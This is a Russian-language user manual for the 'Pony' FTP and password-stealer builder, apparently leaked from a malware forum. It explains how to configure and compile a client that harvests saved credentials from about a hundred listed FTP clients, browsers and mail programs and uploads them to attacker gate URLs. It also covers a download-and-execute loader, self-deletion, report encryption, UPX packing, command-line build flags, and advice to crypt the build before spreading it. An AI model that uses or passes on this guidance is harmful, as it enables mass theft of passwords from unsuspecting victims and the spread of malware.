###########################################
#Leaked for TrojanForge.com
###########################################
-=- Система сбора FTP паролей "Pony" -=-
Билдер "PonyBuilder.exe"
========================
Задача билдера - настроить и скомпилировать клиент "Pony.exe", который необходимо прогружать на зараженные компьютеры.
Комплект поставки:
* Папка "masm32" - компилятор Microsoft Macro Assembler (MASM).
* Папка "PonySrc" - исходный код на языке MASM программы-клиента (граббера) "Pony.exe".
* Папка "BuilderSrc" - исходный код на языке Delphi 7 вспомогательной программы-билдера "PonyBuilder.exe".
* Файл "PonyBuilder.exe" - программа-билдер для клиента "Pony.exe".
* Файл "Help.txt" - файл помощи.
* Файл "build.bat" - скрипт используемый билдером для компиляции билда из исходников "PonySrc".
* Файл "Pony.ico" - иконка прикрепляемая к "Pony.exe" при компиляции, если в билдере выбрана соответсвующая опция.
Интерфейс разделен на 4 закладки:
1. Билдер
Текстовое поле "Список URL для отправки паролей" - здесь можно прописать список URL гейтов для отправки паролей.
Каждая строка - отдельный URL, к примеру:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Можно добавить неограниченное количество строк (URL), один и тот же URL можно добавить несколько раз.
Домен может содержать информацию о порте подключения, к примеру:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Протокол https:// на данный момент не поддерживается.
"Pony.exe" будет пытаться подключиться и отправить отчет с паролями по списку, если данные будет успешно доставлены,
программа немедленно завершит работу без попыток подключения к остальным URL.
Кнопка "Выбрать иконку" позволяет установить иконку для компилируемого файла, поддерживается только формат *.ico.
Кнопка "Создать билд" компилирует файл "Pony.exe" с заданными настройками.
2. Лоадер
Простой лоадер (загрузчик файлов). После сбора паролей с указанных линков (URL) будут загружены и запущены файлы.
URL задаются таким же образом, как и список доменов для отправки паролей.
В нижней части закладки можно задать следующие опции:
* Активировать лоадер - включить работу лоадера, иначе файлы загружаться не будут.
* Не запускать одинаковые файлы дважды - после успешного запуска скачанного файла в реестр будет добавлено контрольное значение
(хеш) данных файла, после чего, при повторной загрузке, дубликат запущен не будет.
3. Настройки
Для того, чтобы увидеть все настройки, нужно активировать опцию "Показать продвинутые настройки" в главном меню.
* Сжимать - сжимать отчеты с помощью библиотеки aPLib, прибавляет около 5Кб к размеру исполняемого файла,
хорошо пакует текстовые данные перед отправкой, настоятельно рекомендуется использовать, сильно снижает трафик
к серверу.
* Шифровать - шифровать отчеты алгоритмом RC4.
* Пароль шифрования - пароль, которым шифруются отчеты, аналогичный пароль необходимо установить в настройках сервера.
* Сохранять отчеты на диск (для отладки) - при запуске "Pony.exe", после того как были собраны пароли, в той же папке
где был запущен исполняемый файл, будет создан файл "out.bin", это контейнер с паролями в таком виде, в каком он отправляется
на сервер для последующей обработки (дешифровки).
* Отсылать пустые отчеты (для статистики) - обычно, если ни одного пароля не найдено, клиент "Pony.exe" ничего отправлять
серверу не будет, но иногда полезно включение данной опции для получения статистики о количестве успешных запусков "Pony.exe".
* Режим отладки - снимает перехватчик исключений, убирает код затрудняющий отладку и дизассемблирование программы, использовать исключительно в целях отладки.
* Отсылать только новые отчеты - если опция не активирована, тогда дублирующие отчеты с паролями отправляться не будут.
* Самоудаление - запущенный файл "Pony.exe" будет удален после того как завершит свою работу.
* Добавить иконку - прикрепить выбранную иконку к компилируемому файлу.
* Паковать билд с помощью UPX - сжать исполняемый файл "Pony.exe" после компиляции.
* Количество попыток отправить отчет - сколько раз пытаться отправить отчет при неуспешной передаче, рекомендуется указать минимум 2 попытки
* Вариант сборки:
* Exe-файл - обычный исполняемый файл Windows (*.exe)
* Dll-файл - вариант сборки в виде .dll библиотеки, она абсолютно автономна, для отработки необходимо вызвать из вашего проекта лишь API-функцию LoadLibrary(), т.е. URL для отправки паролей
и все настройки вшиваются в сам .dll файл. В папке DllTest лежит простой пример использования-тестирования, в эту же папку необходимо положить файл Pony.dll, после чего запустить файл DllTest.exe,
который в свою очередь вызывает LoadLibrary() для .dll библиотеки.
В списке "Доступные модули дешифровки" можно исключить из билда ненужные дешифровщики паролей, это уменьшит размер билда.
4. Скин
На этой закладке можно выбрать понравившийся скин (шкурку) билдера.
Запуск билдера с командной строки
=================================
Доступны следующие аргументы командной строки билдера:
-PACK_REPORT - сжимать отчеты
-ENCRYPT_REPORT - шифровать отчеты, если пароль шифрования не задан, то по умолчанию будет указан "Mesoamerica"
-REPORT_PASSWORD= - пароль шифрования, к примеру: -REPORT_PASSWORD=Mesoamerica
-SAVE_REPORT - сохранять отчеты на диск (для отладки)
-ENABLE_DEBUG_MODE - режим отладки
-SEND_MODIFIED_ONLY - отсылать только новые отчеты
-SELF_DELETE - активировать самоудаление
-SEND_EMPTY_REPORTS - отсылать пустые отчеты
-ADD_ICON - прикрепить иконку из файла Pony.ico
-UPX - паковать билд с помощью UPX
-DOMAIN_LIST= - список доменов, каждый домен должен быть разделен с помощью спец. символа \n, к примеру: -DOMAIN_LIST=
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
-LOADER_LIST= - список URL для лоадера (будет активирован автоматически при наличии URL), каждый URL должен быть разделен аналогично DOMAIN_LIST
-LOADER_EXECUTE_NEW_FILES_ONLY - не запускать одинаковые файлы дважды
-DISABLE_MODULE= - исключить из билда определенный модуль дешифровки (все названия модулей можно увидеть в файле PonySrc\FTPClients.asm), к примеру: -DISABLE_MODULE=MODULE_OPERA
-DLL_MODE - использовать вариант сборки в виде Dll-библиотеки
-COLLECT_HTTP - дополнительно собирать и HTTP/HTTPS пароли
-COLLECT_EMAIL - дополнительно собирать и E-mail пароли (POP3, IMAP, SMTP)
-UPLOAD_RETRIES=N - количество (N) попыток отправить отчет, если значение не указано, то по умолчанию используются 2 попытки
Клиент "Pony.exe"
=================
Задача "Pony.exe" - собрать пароли с компьютера и отправить их на сервер для последующей обработки.
Работает на всех NT версиях Windows, начиная с Win98, включая серверные. Поддерживается работа в режиме x86 и x64.
Программа нормально отрабатывает при запуске с правами администратора или пользователя.
Перед распространением файл желательно почистить и криптануть.
Реализована мгновенная дешифровка сохраненных паролей для следующих программ:
* FAR Manager
* Total Commander
* WS_FTP
* CuteFTP
* FlashFXP
* FileZilla
* FTP Commander
* BulletProof FTP
* SmartFTP
* TurboFTP
* FFFTP
* CoffeeCup FTP
* CoreFTP
* FTP Explorer
* Frigate3 FTP
* SecureFX
* UltraFXP
* FTPRush
* WebSitePublisher
* BitKinex
* ExpanDrive
* ClassicFTP
* Fling
* SoftX
* Directory Opus
* FreeFTP
* DirectFTP (определяется как FreeFTP)
* LeapFTP
* WinSCP
* 32bit FTP
* NetDrive
* WebDrive
* FTP Control
* Opera
* WiseFTP
* FTP Voyager
* Firefox
* FireFTP
* SeaMonkey
* Flock
* Mozilla Suite Browser
* LeechFTP
* Odin Secure FTP Expert
* WinFTP
* FTP Surfer
* FTPGetter
* ALFTP
* Internet Explorer
* Dreamweaver
* DeluxeFTP
* Google Chrome
* Chromium
* SRWare Iron (определяется как Chromium)
* ChromePlus
* Bromium (Yandex Chrome)
* Nichrome
* Comodo Dragon
* RockMelt
* K-Meleon
* Epic
* Staff-FTP
* AceFTP
* Global Downloader
* FreshFTP
* BlazeFTP
* NETFile
* GoFTP
* 3D-FTP
* Easy FTP
* Xftp
* FTP Now
* Robo-FTP
* LinasFTP
* Cyberduck
* Putty
* Notepad++ (NppFTP)
* CoffeeCup Visual Site Designer
* CoffeeCup Sitemapper (определяется как CoffeeCup FTP)
* FTPShell
* FTPInfo
* NexusFile
* FastStone Browser
* CoolNovo
* WinZip
* Yandex.Internet
* MyFTP
* sherrod FTP
* NovaFTP
* Windows Mail
* Windows Live Mail
* Pocomail
* Becky!
* IncrediMail
* The Bat!
* Outlook
* Thunderbird
* FastTrackFTP